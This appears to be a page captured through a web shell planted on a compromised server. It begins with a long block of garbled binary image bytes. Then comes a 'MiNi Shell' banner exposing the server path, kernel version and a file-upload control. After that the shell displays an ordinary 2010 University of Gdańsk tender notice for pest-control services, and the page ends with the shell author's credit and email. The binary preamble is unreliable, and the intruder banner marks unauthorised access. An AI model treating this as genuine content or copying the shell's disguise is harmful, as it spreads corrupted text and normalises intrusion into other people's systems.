JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100125/15681-N-2010.html

<p class="kh_header"><b>Gdańsk: wykonanie usługi: dezynfekcji, dezynsekcji lub deratyzacji w domach studenckich oraz obiektach dydaktycznych Uniwersytetu Gdańskiego do 31.01.2012r.</b><br>
<b>Numer ogłoszenia: 15681 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie usługi: dezynfekcji, dezynsekcji lub deratyzacji w domach studenckich oraz obiektach dydaktycznych Uniwersytetu Gdańskiego do 31.01.2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dezynfekcja, dezynsekcja  i  deratyzacja       w domach studenckich oraz obiektach dydaktycznych Uniwersytetu Gdańskiego w okresie od podpisania umowy do 31.01.2012 r.  
nr CPV: 90670000 - 4.
2. Zakres przedmiotu zamówienia:
    Częstotliwość, terminy realizacji świadczonych usług, o których mowa powyżej          z zastrzeżeniem warunków podanych w dalszej części, oraz ich zakres, będzie wynikał ze zgłoszenia dokonanego każdorazowo przez specjalistę kierujacego danym domem studenckim lub obiektem Uniwersytetu Gdańskiego w zależności     od zaistnienia faktycznej konieczności, oraz stwierdzonego na miejscu stanu rzeczy. 
Zamawiający pragnie, aby Wykonawca przeprowadzał usługi dezynfekcji, dezynsekcji i deratyzacji we wszystkich obiektach objętych niniejszym postępowaniem według zaistniałych potrzeb wynikających nie z określonego harmonogramu lecz sytuacji wymagających reakcji interwencyjnej.

Dodatkowo na:

	Wydziale Prawa i Administracji, 
	Wydziale Historycznym, 
	Wydziale Matematyki, Fizyki i Informatyki, 
	Wydziale Nauk Społecznych 
	w Rektoracie 
	w Bibliotece Głównej 
zapewnienie stałej ochrony wewnętrznej i zewnętrznej przed gryzoniami, polegającą na wystawieniu stacji  deratyzacyjnych oraz serwisowaniu ich raz w miesiącu.

    Zamawiający pragnie, aby Wykonawca przeprowadzał usługi DDD we wszystkich obiektach objętych niniejszym postępowaniem według zaistniałych potrzeb wynikających nie z określonego harmonogramu, lecz sytuacji wymagających reakcji interwencyjnej.
Wykaz domów studenckich oraz obiektów dydaktycznych Uniwersytetu Gdańskiego objętych postępowaniem stanowi - załącznik  nr 10 do SIWZ. 
3. Wykonawca wykona usługę w sposób odpowiadający zamawiającemu, zatrudniając własnych pracowników, przy użyciu własnych narzędzi do pracy oraz własnych preparatów niskotoksycznych posiadających atesty Ministerstwa Zdrowia lub Państwowego Zakładu Higieny bez potrzeby opuszczania obiektu przez mieszkańców i pracowników obiektu.
4. Wykonawca jest odpowiedzialny za zabezpieczenie warunków pracy swoich pracowników i wykonanie usługi zgodnie z obowiązującymi przepisami bhp i p. poż.
5. Wykonawcy zaoferują 6-miesięczną gwarancje na świadczone przez siebie usługi, nie dłuższy niż 48 godzin czas reakcji na zgłoszenie specjalisty kierującego administracją obiektu (domu) lub osoby upoważnionej (rozumiany jako podjęcie wykonywania usługi od momentu zgłoszenia), wykonanie usługi, czyli przywrócenie stanu zgodnego z charakterem realizowanej usługi, w terminie do 24 godzin od momentu wejścia na dany obiekt (dom) lub w terminie uzgodnionym ze specjalistą kierującym administracją obiektu (domu) lub osobą upoważnioną.
    Powyższe warunki mają na celu zdyscyplinowanie i określenie ram czasowych względem Wykonawcy.
                                                                                                                         Zamawiający, odrzuci ofertę, która zawiera niejednoznacznie określenie stawki (ceny) lub proponuje inne wykonanie przedmiotu zamówienia od wskazanego.                                                         Zamawiający nie przewiduje prowadzenia jakichkolwiek negocjacji z Wykonawcami na temat  zaoferowanych cen.	                                                                                                  Wykonawca zobowiązuje się zrealizować pełen zakres rzeczowy zamówienia z należytą starannością, zgodnie z warunkami przeprowadzonego postępowania przetargowego, stosownie do specyfiki i charakteru usługi  objętej  niniejszą umową, obowiązującymi przepisami polskimi i europejskimi normami, ogólnie przyjętą wiedzą w tym zakresie oraz ustaleniami z Zamawiającym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.67.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:

           1) posiadania  uprawnień  do wykonywania  określonej działalności lub czynności,  jeżeli przepisy prawa nakładają  obowiązek  ich posiadania; 
          2) posiadania  wiedzy i doświadczenia.
          3) dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi  do wykonania zamówienia.
          4)  sytuacji ekonomicznej  i  finansowej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Załącznik nr  3 - oświadczenie o  spełnianiu warunków  udziału w postępowaniu ,  podpisane przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu wykonawcy.
 W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną   ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu.
2.	Załącznik  nr 5 (do SIWZ) - wykaz wykonanych, a w przypadku  świadczeń okresowych lub ciągłych również   wykonywanych,  usług  w  zakresie  niezbędnym  do wykazania  spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, co najmniej  jednej dostawy  o wartości  nie mniejszej niż 100.000 zł brutto (w ciągu roku zamówienia mogą być zsumowane), odpowiadających swoim rodzajem, usługom stanowiącym przedmiot zamówienia,   z podaniem  ich wartości, przedmiotu, dat wykonania  i odbiorców, oraz   załączeniem  dokumentów potwierdzających, że te dostawy  zostały wykonane   lub są wykonywane należycie; wypełniony i podpisany przez osob(ę)y upoważnion(ą)e do składania oświadczeń  woli w   imieniu wykonawcy
            W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), jeden z wykonawców , upoważniony przez pozostałych jako ich reprezentant, zobowiązany jest do załączenia w.w. dokumentu.
3.  Załącznik nr 8 do SIWZ wykaz urządzeń,  wypełniony i podpisany  przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli   w imieniu Wykonawcy.                                                                                                                    W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden                       z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).
4. Załącznik  nr 7 do SIWZ wykaz środków do dezynfekcji, dezynsekcji i deratyzacji , wypełniony i podpisany  przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli   w imieniu Wykonawcy.                                                                                                                    W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden                       z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).

 Ofertę stanowią:                                                                   
1.	Załącznik nr 1 - strona tytułowa oferty (do SIWZ)  -  wg. załączonego wzoru oferty , wypełniona   i podpisana,  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.
W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).

2.	 Załącznik nr 2 - kosztorys cenowy (do SIWZ), wypełniony i podpisany  przez osob(ę)y  upoważnion(ą)e do składania oświadczeń woli  w imieniu Wykonawcy.
W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną  ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pdzp.univ.gda.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2010 godzina 11:00, miejsce: pokój 124 Rektorat, ul. Bażyńskiego 1A, 80-952.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com